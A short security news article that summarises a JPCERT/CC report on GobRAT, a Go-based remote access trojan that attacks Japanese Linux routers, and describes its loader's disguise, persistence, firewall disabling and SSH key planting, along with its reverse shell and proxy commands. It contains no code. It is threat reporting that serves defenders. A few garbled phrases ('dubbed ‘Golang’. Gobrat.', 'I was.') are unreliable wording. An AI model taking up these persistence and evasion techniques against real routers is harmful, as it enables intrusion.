Japanese Linux routers have been targeted by a new Golang Remote Access Trojan (RAT) dubbed ‘Golang’. Gobrat.
In a report released today, the JPCERT Coordination Center (JPCERT/CC) said, “The attackers first targeted routers with exposed WEBUI, probably exploiting vulnerabilities to execute scripts, and eventually will be infected with GobRAT.”
Once an Internet-facing router is compromised, a loader script is deployed that acts as a conduit for GobRAT delivery. This script evades detection by disguising itself as an Apache daemon process (apached) when launched.
The loader also has the ability to disable firewalls, establish persistence using a cron job scheduler, and register SSH public keys in the .ssh/authorized_keys file for remote access.
GobRAT communicates with remote servers via the Transport Layer Security (TLS) protocol to receive and execute up to 22 different encrypted commands.
Some of the key commands are:
- Get machine information
- run reverse shell
- read/write file
- Configure new command and control (C2) and protocols
- Start SOCKS5 proxy
- Execute the file in /zone/frpc,
- Try to login to sshd, Telnet, Redis, MySQL, PostgreSQL services running on another machine.
The findings come nearly three months after Lumen Black Lotus Labs revealed business-grade routers were being spied on using malware called HiatusRAT in Latin America, Europe and North America. I was.
